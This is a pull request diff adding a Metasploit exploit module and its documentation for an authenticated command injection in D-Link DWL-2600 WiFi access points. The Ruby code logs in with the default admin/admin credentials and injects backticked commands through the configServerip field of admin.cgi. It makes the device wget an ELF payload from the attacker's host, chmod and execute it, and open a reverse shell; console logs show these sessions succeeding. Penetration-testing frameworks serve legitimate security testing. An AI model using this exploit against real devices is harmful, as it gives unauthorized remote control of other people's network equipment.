### PR TITLE
Adding DLINK DWL-2600 Command Injection Module

### DIFF
--- a/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md
+++ b/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md
@@ -1,16 +1,21 @@
 # DLINK DWL-2600 Authenticated Command Injection
 
 ## Overview
-DLINK DWL-2600 WiFi Access Points contain an authenticated command injection vulnerability.  This vulnerability was originally discovered by RAKI BEN HAMOUDA and posted to exploit db here: [https://www.exploit-db.com/exploits/46841](https://www.exploit-db.com/exploits/46841).
+DLINK DWL-2600 WiFi Access Points contain an authenticated command injection vulnerability.  This vulnerability was originally discovered by RAKI BEN HAMOUDA and posted to exploit db here: [https://www.exploit-db.com/exploits/46841](https://www.exploit-db.com/exploits/46841). Original testing was performed against firmware version `4.2.0.15` though other versions are likely affected.
 
 ## Options
-* HttpUsername - defaults to 'admin'
-* HttpPassword - defaults to 'admin'
-* DOWNHOST - Alternative host to request MIPS payload from.
-* DOWNFILE - File name to download - defaults to a random value.
-* HTTP_DELAY - Time that the HTTP Server will wait for the ELF payload request.
+### HttpUsername
+Defaults to admin, this is the username that is used to authenticate to the device
+### HttpPassword
+Defaults to admin, this is hte password that is used to authenticate to the device
+### DOWNHOST
+Alternative host to request MIPS payload from.
+### DOWNFILE
+File name to download - defaults to a random value.
+### HTTP_DELAY
+Time that the HTTP Server will wait for the ELF payload request.
 
-In addtiion you will probably want to set `LHOST` and `SRVHOST`.
+In addition you will probably want to set `LHOST` and `SRVHOST`.
 
 ## Payloads
 ```
@@ -36,7 +41,7 @@ Compatible Payloads
 
 ```
 
-## Example output
+## Scenarios
 ```
 msf5 exploit(linux/http/dlink_dwl_2600_command_injection) >          
 [*] Started reverse TCP handler on 192.168.0.101:4444                                                                                                                                                                

--- a/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md
+++ b/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md
@@ -1,0 +1,58 @@
+# DLINK DWL-2600 Authenticated Command Injection
+
+## Overview
+DLINK DWL-2600 WiFi Access Points contain an authenticated command injection vulnerability.  This vulnerability was originally discovered by RAKI BEN HAMOUDA and posted to exploit db here: [https://www.exploit-db.com/exploits/46841](https://www.exploit-db.com/exploits/46841).
+
+## Options
+* HttpUsername - defaults to 'admin'
+* HttpPassword - defaults to 'admin'
+* DOWNHOST - Alternative host to request MIPS payload from.
+* DOWNFILE - File name to download - defaults to a random value.
+* HTTP_DELAY - Time that the HTTP Server will wait for the ELF payload request.
+
+In addtiion you will probably want to set `LHOST` and `SRVHOST`.
+
+## Payloads
+```
+msf5 exploit(linux/http/dlink_dwl_2600_command_injection) > show payloads
+
+Compatible Payloads
+===================
+
+   #   Name                                    Disclosure Date  Rank    Check  Description
+   -   ----                                    ---------------  ----    -----  -----------
+   0   generic/custom                                           normal  No     Custom Payload
+   1   generic/shell_bind_tcp                                   normal  No     Generic Command Shell, Bind TCP Inline
+   2   generic/shell_reverse_tcp                                normal  No     Generic Command Shell, Reverse TCP Inline
+   3   linux/mipsle/exec                                        normal  No     Linux Execute Command
+   4   linux/mipsle/meterpreter/reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Stager
+   5   linux/mipsle/meterpreter_reverse_http                    normal  No     Linux Meterpreter, Reverse HTTP Inline
+   6   linux/mipsle/meterpreter_reverse_https                   normal  No     Linux Meterpreter, Reverse HTTPS Inline
+   7   linux/mipsle/meterpreter_reverse_tcp                     normal  No     Linux Meterpreter, Reverse TCP Inline
+   8   linux/mipsle/reboot                                      normal  No     Linux Reboot
+   9   linux/mipsle/shell/reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Stager
+   10  linux/mipsle/shell_bind_tcp                              normal  No     Linux Command Shell, Bind TCP Inline
+   11  linux/mipsle/shell_reverse_tcp                           normal  No     Linux Command Shell, Reverse TCP Inline
+
+```
+
+## Example output
+```
+msf5 exploit(linux/http/dlink_dwl_2600_command_injection) >          
+[*] Started reverse TCP handler on 192.168.0.101:4444                                                                                                                                                                
+[*] 192.168.0.100:80 - Trying to login with admin / admin                                             
+[+] 192.168.0.100:80 - Successful login admin/admin                                                       
+[+] 192.168.0.100:80 - Received Auth token: dXXKqdASZYXccuuzDVICgKzxRyKqBXQE                                                                                                                                         
+[*] 192.168.0.100:80 - Starting up our web service on http://192.168.0.101:8080/PxAlyUgUNw ...                                                                                                                       
+[*] Using URL: http://192.168.0.101:8080/PxAlyUgUNw                                                       
+[*] 192.168.0.100:80 - Asking the DLINK device to download http://192.168.0.101:8080/PxAlyUgUNw           
+[*] Sending CGI payload using token: dXXKqdASZYXccuuzDVICgKzxRyKqBXQE                                     
+[*] 192.168.0.100:80 - Sending the payload to the server...                                               
+[*] 192.168.0.100:80 - Waiting for the victim to request the ELF payload...                               
+[*] 192.168.0.100:80 - Asking the DLINK device to chmod PxAlyUgUNw                                        
+[*] Sending CGI payload using token: dXXKqdASZYXccuuzDVICgKzxRyKqBXQE                                     
+[*] 192.168.0.100:80 - Asking the DLINK device to execute PxAlyUgUNw                   
+[*] Sending CGI payload using token: dXXKqdASZYXccuuzDVICgKzxRyKqBXQE                                     
+[*] Command shell session 1 opened (192.168.0.101:4444 -> 192.168.0.100:39856) at 2019-12-24 11:08:47 -0600                                                                                                          
+[+] Deleted /tmp/lxnlxbhr
+```

--- a/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md
+++ b/documentation/modules/exploit/linux/http/dlink_dwl_2600_command_injection.md
@@ -43,21 +43,21 @@ Compatible Payloads
 
 ## Scenarios
 ```
-msf5 exploit(linux/http/dlink_dwl_2600_command_injection) >          
-[*] Started reverse TCP handler on 192.168.0.101:4444                                                                                                                                                                
-[*] 192.168.0.100:80 - Trying to login with admin / admin                                             
-[+] 192.168.0.100:80 - Successful login admin/admin                                                       
-[+] 192.168.0.100:80 - Received Auth token: dXXKqdASZYXccuuzDVICgKzxRyKqBXQE                                                                                                                                         
-[*] 192.168.0.100:80 - Starting up our web service on http://192.168.0.101:8080/PxAlyUgUNw ...                                                                                                                       
-[*] Using URL: http://192.168.0.101:8080/PxAlyUgUNw                                                       
-[*] 192.168.0.100:80 - Asking the DLINK device to download http://192.168.0.101:8080/PxAlyUgUNw           
-[*] Sending CGI payload using token: dXXKqdASZYXccuuzDVICgKzxRyKqBXQE                                     
-[*] 192.168.0.100:80 - Sending the payload to the server...                                               
-[*] 192.168.0.100:80 - Waiting for the victim to request the ELF payload...                               
-[*] 192.168.0.100:80 - Asking the DLINK device to chmod PxAlyUgUNw                                        
-[*] Sending CGI payload using token: dXXKqdASZYXccuuzDVICgKzxRyKqBXQE                                     
-[*] 192.168.0.100:80 - Asking the DLINK device to execute PxAlyUgUNw                   
-[*] Sending CGI payload using token: dXXKqdASZYXccuuzDVICgKzxRyKqBXQE                                     
-[*] Command shell session 1 opened (192.168.0.101:4444 -> 192.168.0.100:39856) at 2019-12-24 11:08:47 -0600                                                                                                          
-[+] Deleted /tmp/lxnlxbhr
+msf5 exploit(linux/http/dlink_dwl_2600_command_injection) > exploit
+
+[*] Started reverse TCP handler on 192.168.0.101:4444 
+[*] 192.168.0.100:80 - Trying to login with admin / admin
+[+] 192.168.0.100:80 - Successful login admin/admin
+[+] 192.168.0.100:80 - Received Auth token: SAZxUXJsuDwQDVhqLayWvGZNlWDIODhi
+[*] Using URL: http://0.0.0.0:8080/mnHnGuZ0euTGyf5
+[*] Local IP: http://192.168.0.101:8080/mnHnGuZ0euTGyf5
+[*] Sending CGI payload using token: SAZxUXJsuDwQDVhqLayWvGZNlWDIODhi
+[*] Client 192.168.0.100 (Wget) requested /mnHnGuZ0euTGyf5
+[*] Sending payload to 192.168.0.100 (Wget)
+[*] Command Stager progress -  54.24% done (64/118 bytes)
+[*] Sending CGI payload using token: SAZxUXJsuDwQDVhqLayWvGZNlWDIODhi
+[*] Command Stager progress -  72.88% done (86/118 bytes)
+[*] Sending CGI payload using token: SAZxUXJsuDwQDVhqLayWvGZNlWDIODhi
+[*] Command shell session 3 opened (192.168.0.101:4444 -> 192.168.0.100:33318) at 2020-03-26 20:10:26 -0500
+[*] Server stopped.
 ```

--- a/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
+++ b/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
@@ -147,8 +147,6 @@ class MetasploitModule < Msf::Exploit::Remote
       res = request(cmd,token)
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") unless res
       print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
-      end
-      return
     end
 
     @pl = generate_payload_exe

--- a/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
+++ b/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
@@ -26,7 +26,7 @@ class MetasploitModule < Msf::Exploit::Remote
       'License'     => MSF_LICENSE,
       'References'  =>
         [
-          [ 'EDB', '46481' ],
+          [ 'EDB', '46841' ],
         ],
       'DisclosureDate' => 'May 15 2019',
       'Privileged'     => true,
@@ -83,7 +83,7 @@ class MetasploitModule < Msf::Exploit::Remote
         'query'  => 'action=config_restore'
       })
 
-      if not res or res.code != 200
+      unless res || res.code != 200
         print_error("File wasn't uploaded, aborting!")
         return
       end
@@ -97,7 +97,7 @@ class MetasploitModule < Msf::Exploit::Remote
   end
 
   def exploit
-    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
+    downfile = datastore['DOWNFILE'] || rand_text_alpha(8..16)
     user = datastore['HttpUsername']
     pass = datastore['HttpPassword']
     rhost = datastore['RHOST']
@@ -131,7 +131,6 @@ class MetasploitModule < Msf::Exploit::Remote
 
       if token.empty?
         fail_with(Failure::NoAccess, "#{peer} - No Auth token received")
-        return
       end
 
       print_good("#{peer} - Received Auth token: #{token}")
@@ -141,15 +140,13 @@ class MetasploitModule < Msf::Exploit::Remote
     end
 
     if target.name =~ /CMD/
-      if not (datastore['CMD'])
+      unless (datastore['CMD'])
         fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
       end
       cmd = payload.encoded
       res = request(cmd,token)
-      if (!res)
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
-      else
-        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") unless res
+      print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
       end
       return
     end
@@ -201,7 +198,7 @@ class MetasploitModule < Msf::Exploit::Remote
     #not working if we send all command together -> lets take three requests
     cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
     res = request(cmd,token)
-    if (!res)
+    unless res
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
     end
 
@@ -220,7 +217,7 @@ class MetasploitModule < Msf::Exploit::Remote
     cmd = "/bin/chmod 777 /tmp/#{filename}"
     print_status("#{rhost}:#{rport} - Asking the DLINK device to chmod #{downfile}")
     res = request(cmd,token)
-    if (!res)
+    unless res
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
     end
 
@@ -230,7 +227,7 @@ class MetasploitModule < Msf::Exploit::Remote
     cmd = "/tmp/#{filename}"
     print_status("#{rhost}:#{rport} - Asking the DLINK device to execute #{downfile}")
     res = request(cmd,token)
-    if (!res)
+    unless res
       fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
     end
 
@@ -239,7 +236,7 @@ class MetasploitModule < Msf::Exploit::Remote
   # Handle incoming requests from the server
   def on_request_uri(cli, request)
     #print_status("on_request_uri called: #{request.inspect}")
-    if (not @pl)
+    unless @pl
       print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
       return
     end
@@ -257,7 +254,7 @@ class MetasploitModule < Msf::Exploit::Remote
       select(nil, nil, nil, 1)
       waited += 1
       if (waited > datastore['HTTP_DELAY'])
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request the ELF payload -- Maybe it can't connect back to us?")
       end
     end
   end

--- a/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
+++ b/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
@@ -1,0 +1,264 @@
+##
+# This module requires Metasploit: https://metasploit.com/download
+# Current source: https://github.com/rapid7/metasploit-framework
+##
+
+class MetasploitModule < Msf::Exploit::Remote
+  Rank = ExcellentRanking
+
+  include Msf::Exploit::Remote::HttpClient
+  include Msf::Exploit::Remote::HttpServer
+  include Msf::Exploit::EXE
+  include Msf::Exploit::FileDropper
+
+  def initialize(info = {})
+    super(update_info(info,
+      'Name'        => 'DLINK DWL-2600 Authenticated Remote Command Injection',
+      'Description' => %q{
+          Some DLINK Access Points are vulnerable to an authenticated OS command injection.
+          Default credentials for the web interface are admin/admin.
+      },
+      'Author'      =>
+        [
+          'RAKI BEN HAMOUDA', # Vulnerability discovery and original research
+          'Nick Starke' # Metasploit Module
+        ],
+      'License'     => MSF_LICENSE,
+      'References'  =>
+        [
+          [ 'EDB', '46481' ],
+        ],
+      'DisclosureDate' => 'May 15 2019',
+      'Privileged'     => true,
+      'Platform'       => %w{ linux unix },
+      'Payload'        =>
+        {
+          'DisableNops' => true,
+          'BadChars' => "\x00"
+        },
+      'Targets'        =>
+        [
+          [ 'CMD',
+            {
+            'Arch' => ARCH_CMD,
+            'Platform' => 'unix'
+            }
+          ],
+          [ 'Linux mips Payload',
+            {
+            'Arch' => ARCH_MIPSLE,
+            'Platform' => 'linux'
+            }
+          ],
+        ],
+      'DefaultTarget'  => 1
+      ))
+
+    register_options(
+      [
+        OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),
+        OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
+        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
+        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
+        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
+      ])
+  end
+
+
+  def request(cmd,token)
+    begin
+      bogus = Rex::Text.rand_text_alpha(rand(10))
+      post_data = Rex::MIME::Message.new
+      post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
+      post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
+      post_data.add_part("`#{cmd}`", nil, nil, "form-data; name=\"configServerip\"")
+
+      print_status("Sending CGI payload using token: #{token}")
+      res = send_request_cgi({
+        'method' => 'POST',
+        'uri'    => '/admin.cgi',
+        'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+        'cookie' => "sessionHTTP=#{token};",
+        'data'   => post_data.to_s,
+        'query'  => 'action=config_restore'
+      })
+
+      if not res or res.code != 200
+        print_error("File wasn't uploaded, aborting!")
+        return
+      end
+
+      return res
+
+    rescue ::Rex::ConnectionError
+      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+      return nil
+    end
+  end
+
+  def exploit
+    downfile = datastore['DOWNFILE'] || rand_text_alpha(8+rand(8))
+    user = datastore['HttpUsername']
+    pass = datastore['HttpPassword']
+    rhost = datastore['RHOST']
+    rport = datastore['RPORT']
+
+    begin
+      print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+      res = send_request_cgi({
+        'uri'    => '/admin.cgi',
+        'method' => 'POST',
+        'vars_post'   => {
+          'i_username' => user,
+          'i_password' => pass,
+          'login'      => 'Logon'
+        }
+      })
+
+      if res.nil? or res.code == 404
+        fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
+      end
+      if [200, 301, 302].include?(res.code)
+        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+      else
+        fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
+      end
+
+      delstart = 'var cookieValue = "'
+      tokenoffset = res.body.index(delstart) + delstart.size
+      endoffset = res.body.index('";', tokenoffset)
+      token = res.body[tokenoffset, endoffset - tokenoffset]
+
+      if token.empty?
+        fail_with(Failure::NoAccess, "#{peer} - No Auth token received")
+        return
+      end
+
+      print_good("#{peer} - Received Auth token: #{token}")
+
+    rescue ::Rex::ConnectionError
+      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
+    end
+
+    if target.name =~ /CMD/
+      if not (datastore['CMD'])
+        fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
+      end
+      cmd = payload.encoded
+      res = request(cmd,token)
+      if (!res)
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload")
+      else
+        print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
+      end
+      return
+    end
+
+    @pl = generate_payload_exe
+    @elf_sent = false
+
+    #
+    # start our server
+    #
+    resource_uri = '/' + downfile
+
+    if (datastore['DOWNHOST'])
+      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+    else
+      #do not use SSL
+      if datastore['SSL']
+        ssl_restore = true
+        datastore['SSL'] = false
+      end
+
+      #we use SRVHOST as download IP for the coming wget command.
+      #SRVHOST needs a real IP address of our download host
+      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
+        srv_host = Rex::Socket.source_address(rhost)
+      else
+        srv_host = datastore['SRVHOST']
+      end
+
+      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
+      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
+      start_service({'Uri' => {
+        'Proc' => Proc.new { |cli, req|
+          on_request_uri(cli, req)
+        },
+        'Path' => resource_uri
+      }})
+
+      datastore['SSL'] = true if ssl_restore
+    end
+
+    #
+    # download payload
+    #
+    print_status("#{rhost}:#{rport} - Asking the DLINK device to download #{service_url}")
+    #this filename is used to store the payload on the device
+    filename = rand_text_alpha_lower(8)
+
+    #not working if we send all command together -> lets take three requests
+    cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
+    res = request(cmd,token)
+    if (!res)
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
+    end
+
+    # wait for payload download
+    if (datastore['DOWNHOST'])
+      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the DLINK device to download the payload")
+      select(nil, nil, nil, datastore['HTTP_DELAY'])
+    else
+      wait_linux_payload
+    end
+    register_file_for_cleanup("/tmp/#{filename}")
+
+    #
+    # chmod
+    #
+    cmd = "/bin/chmod 777 /tmp/#{filename}"
+    print_status("#{rhost}:#{rport} - Asking the DLINK device to chmod #{downfile}")
+    res = request(cmd,token)
+    if (!res)
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
+    end
+
+    #
+    # execute
+    #
+    cmd = "/tmp/#{filename}"
+    print_status("#{rhost}:#{rport} - Asking the DLINK device to execute #{downfile}")
+    res = request(cmd,token)
+    if (!res)
+      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
+    end
+
+  end
+
+  # Handle incoming requests from the server
+  def on_request_uri(cli, request)
+    #print_status("on_request_uri called: #{request.inspect}")
+    if (not @pl)
+      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
+      return
+    end
+    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
+    @elf_sent = true
+    send_response(cli, @pl)
+  end
+
+  # wait for the data to be sent
+  def wait_linux_payload
+    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
+
+    waited = 0
+    while (not @elf_sent)
+      select(nil, nil, nil, 1)
+      waited += 1
+      if (waited > datastore['HTTP_DELAY'])
+        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request request the ELF payload -- Maybe it cant connect back to us?")
+      end
+    end
+  end
+end

--- a/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
+++ b/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
@@ -59,9 +59,7 @@ class MetasploitModule < Msf::Exploit::Remote
       [
         OptString.new('HttpUsername', [ true, 'The username to authenticate as', 'admin' ]),
         OptString.new('HttpPassword', [ true, 'The password for the specified username', 'admin' ]),
-        OptAddress.new('DOWNHOST', [ false, 'An alternative host to request the MIPS payload from' ]),
-        OptString.new('DOWNFILE', [ false, 'Filename to download, (default: random)' ]),
-        OptInt.new('HTTP_DELAY', [true, 'Time that the HTTP Server will wait for the ELF payload request', 60])
+        OptString.new('TARGETURI', [ true, 'Base path to the Dlink web interface', '/' ])
       ])
   end
 
@@ -101,7 +99,7 @@ class MetasploitModule < Msf::Exploit::Remote
 
     print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
     res = send_request_cgi({
-      'uri'    => '/admin.cgi',
+      'uri'    => normalize_uri(target_uri.path, '/admin.cgi'),
       'method' => 'POST',
       'vars_post'   => {
         'i_username' => user,
@@ -137,32 +135,6 @@ class MetasploitModule < Msf::Exploit::Remote
       execute_command(payload.encoded)
     else
       execute_cmdstager(linemax: 100)
-    end
-  end
-
-  # Handle incoming requests from the server
-  def on_request_uri(cli, request)
-    #print_status("on_request_uri called: #{request.inspect}")
-    unless @pl
-      print_error("#{rhost}:#{rport} - A request came in, but the payload wasn't ready yet!")
-      return
-    end
-    print_status("#{rhost}:#{rport} - Sending the payload to the server...")
-    @elf_sent = true
-    send_response(cli, @pl)
-  end
-
-  # wait for the data to be sent
-  def wait_linux_payload
-    print_status("#{rhost}:#{rport} - Waiting for the victim to request the ELF payload...")
-
-    waited = 0
-    while (not @elf_sent)
-      select(nil, nil, nil, 1)
-      waited += 1
-      if (waited > datastore['HTTP_DELAY'])
-        fail_with(Failure::Unknown, "#{rhost}:#{rport} - Target didn't request the ELF payload -- Maybe it can't connect back to us?")
-      end
     end
   end
 end

--- a/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
+++ b/modules/exploits/linux/http/dlink_dwl_2600_command_injection.rb
@@ -7,9 +7,9 @@ class MetasploitModule < Msf::Exploit::Remote
   Rank = ExcellentRanking
 
   include Msf::Exploit::Remote::HttpClient
-  include Msf::Exploit::Remote::HttpServer
   include Msf::Exploit::EXE
   include Msf::Exploit::FileDropper
+  include Msf::Exploit::CmdStager
 
   def initialize(info = {})
     super(update_info(info,
@@ -36,6 +36,7 @@ class MetasploitModule < Msf::Exploit::Remote
           'DisableNops' => true,
           'BadChars' => "\x00"
         },
+      'CmdStagerFlavor' => :wget,
       'Targets'        =>
         [
           [ 'CMD',
@@ -64,171 +65,79 @@ class MetasploitModule < Msf::Exploit::Remote
       ])
   end
 
+  def execute_command(cmd, opts={})
+    cmd.prepend('/usr/bin/') if cmd.start_with?('wget')
+    bogus = Rex::Text.rand_text_alpha(rand(10))
 
-  def request(cmd,token)
-    begin
-      bogus = Rex::Text.rand_text_alpha(rand(10))
-      post_data = Rex::MIME::Message.new
-      post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
-      post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
-      post_data.add_part("`#{cmd}`", nil, nil, "form-data; name=\"configServerip\"")
+    post_data = Rex::MIME::Message.new
+    post_data.add_part("up", nil, nil, "form-data; name=\"optprotocol\"")
+    post_data.add_part(bogus, nil, nil, "form-data; name=\"configRestore\"")
+    post_data.add_part("`#{cmd}`", nil, nil, "form-data; name=\"configServerip\"")
 
-      print_status("Sending CGI payload using token: #{token}")
-      res = send_request_cgi({
-        'method' => 'POST',
-        'uri'    => '/admin.cgi',
-        'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
-        'cookie' => "sessionHTTP=#{token};",
-        'data'   => post_data.to_s,
-        'query'  => 'action=config_restore'
-      })
+    print_status("Sending CGI payload using token: #{@token}") # Note token is an instance variable now
+    res = send_request_cgi({
+      'method' => 'POST',
+      'uri'    => normalize_uri(target_uri.path, 'admin.cgi'),
+      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
+      'cookie' => "sessionHTTP=#{@token};",
+      'data'   => post_data.to_s,
+      'query'  => 'action=config_restore'
+    })
 
-      unless res || res.code != 200
-        print_error("File wasn't uploaded, aborting!")
-        return
-      end
-
-      return res
-
-    rescue ::Rex::ConnectionError
-      vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
-      return nil
+    unless res || res.code != 200
+      fail_with(Failure::UnexpectedReply, "Command wasn't executed, aborting!")
     end
+
+  rescue ::Rex::ConnectionError
+    vprint_error("#{rhost}:#{rport} - Failed to connect to the web server")
+    return
   end
 
   def exploit
-    downfile = datastore['DOWNFILE'] || rand_text_alpha(8..16)
     user = datastore['HttpUsername']
     pass = datastore['HttpPassword']
     rhost = datastore['RHOST']
     rport = datastore['RPORT']
 
-    begin
-      print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
-      res = send_request_cgi({
-        'uri'    => '/admin.cgi',
-        'method' => 'POST',
-        'vars_post'   => {
-          'i_username' => user,
-          'i_password' => pass,
-          'login'      => 'Logon'
-        }
-      })
+    print_status("#{rhost}:#{rport} - Trying to login with #{user} / #{pass}")
+    res = send_request_cgi({
+      'uri'    => '/admin.cgi',
+      'method' => 'POST',
+      'vars_post'   => {
+        'i_username' => user,
+        'i_password' => pass,
+        'login'      => 'Logon'
+      }
+    })
 
-      if res.nil? or res.code == 404
-        fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
-      end
-      if [200, 301, 302].include?(res.code)
-        print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
-      else
-        fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
-      end
-
-      delstart = 'var cookieValue = "'
-      tokenoffset = res.body.index(delstart) + delstart.size
-      endoffset = res.body.index('";', tokenoffset)
-      token = res.body[tokenoffset, endoffset - tokenoffset]
-
-      if token.empty?
-        fail_with(Failure::NoAccess, "#{peer} - No Auth token received")
-      end
-
-      print_good("#{peer} - Received Auth token: #{token}")
-
-    rescue ::Rex::ConnectionError
-      fail_with(Failure::Unreachable, "#{rhost}:#{rport} - Failed to connect to the web server")
+    unless res && res.code != 404
+      fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
     end
 
+    unless [200, 301, 302].include?(res.code)
+      fail_with(Failure::NoAccess, "#{rhost}:#{rport} - No successful login possible with #{user}/#{pass}")
+    end
+
+    print_good("#{rhost}:#{rport} - Successful login #{user}/#{pass}")
+
+    delstart = 'var cookieValue = "'
+    tokenoffset = res.body.index(delstart) + delstart.size
+    endoffset = res.body.index('";', tokenoffset)
+    token = res.body[tokenoffset, endoffset - tokenoffset]
+
+    if token.empty?
+      fail_with(Failure::NoAccess, "#{peer} - No Auth token received")
+    end
+
+    print_good("#{peer} - Received Auth token: #{token}")
     if target.name =~ /CMD/
-      unless (datastore['CMD'])
+      unless datastore['CMD']
         fail_with(Failure::BadConfig, "#{rhost}:#{rport} - Only the cmd/generic payload is compatible")
       end
-      cmd = payload.encoded
-      res = request(cmd,token)
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to execute payload") unless res
-      print_status("#{rhost}:#{rport} - Blind Exploitation - unknown Exploitation state")
-    end
-
-    @pl = generate_payload_exe
-    @elf_sent = false
-
-    #
-    # start our server
-    #
-    resource_uri = '/' + downfile
-
-    if (datastore['DOWNHOST'])
-      service_url = 'http://' + datastore['DOWNHOST'] + ':' + datastore['SRVPORT'].to_s + resource_uri
+      execute_command(payload.encoded)
     else
-      #do not use SSL
-      if datastore['SSL']
-        ssl_restore = true
-        datastore['SSL'] = false
-      end
-
-      #we use SRVHOST as download IP for the coming wget command.
-      #SRVHOST needs a real IP address of our download host
-      if (datastore['SRVHOST'] == "0.0.0.0" or datastore['SRVHOST'] == "::")
-        srv_host = Rex::Socket.source_address(rhost)
-      else
-        srv_host = datastore['SRVHOST']
-      end
-
-      service_url = 'http://' + srv_host + ':' + datastore['SRVPORT'].to_s + resource_uri
-      print_status("#{rhost}:#{rport} - Starting up our web service on #{service_url} ...")
-      start_service({'Uri' => {
-        'Proc' => Proc.new { |cli, req|
-          on_request_uri(cli, req)
-        },
-        'Path' => resource_uri
-      }})
-
-      datastore['SSL'] = true if ssl_restore
+      execute_cmdstager(linemax: 100)
     end
-
-    #
-    # download payload
-    #
-    print_status("#{rhost}:#{rport} - Asking the DLINK device to download #{service_url}")
-    #this filename is used to store the payload on the device
-    filename = rand_text_alpha_lower(8)
-
-    #not working if we send all command together -> lets take three requests
-    cmd = "/usr/bin/wget #{service_url} -O /tmp/#{filename}"
-    res = request(cmd,token)
-    unless res
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
-    end
-
-    # wait for payload download
-    if (datastore['DOWNHOST'])
-      print_status("#{rhost}:#{rport} - Giving #{datastore['HTTP_DELAY']} seconds to the DLINK device to download the payload")
-      select(nil, nil, nil, datastore['HTTP_DELAY'])
-    else
-      wait_linux_payload
-    end
-    register_file_for_cleanup("/tmp/#{filename}")
-
-    #
-    # chmod
-    #
-    cmd = "/bin/chmod 777 /tmp/#{filename}"
-    print_status("#{rhost}:#{rport} - Asking the DLINK device to chmod #{downfile}")
-    res = request(cmd,token)
-    unless res
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
-    end
-
-    #
-    # execute
-    #
-    cmd = "/tmp/#{filename}"
-    print_status("#{rhost}:#{rport} - Asking the DLINK device to execute #{downfile}")
-    res = request(cmd,token)
-    unless res
-      fail_with(Failure::Unknown, "#{rhost}:#{rport} - Unable to deploy payload")
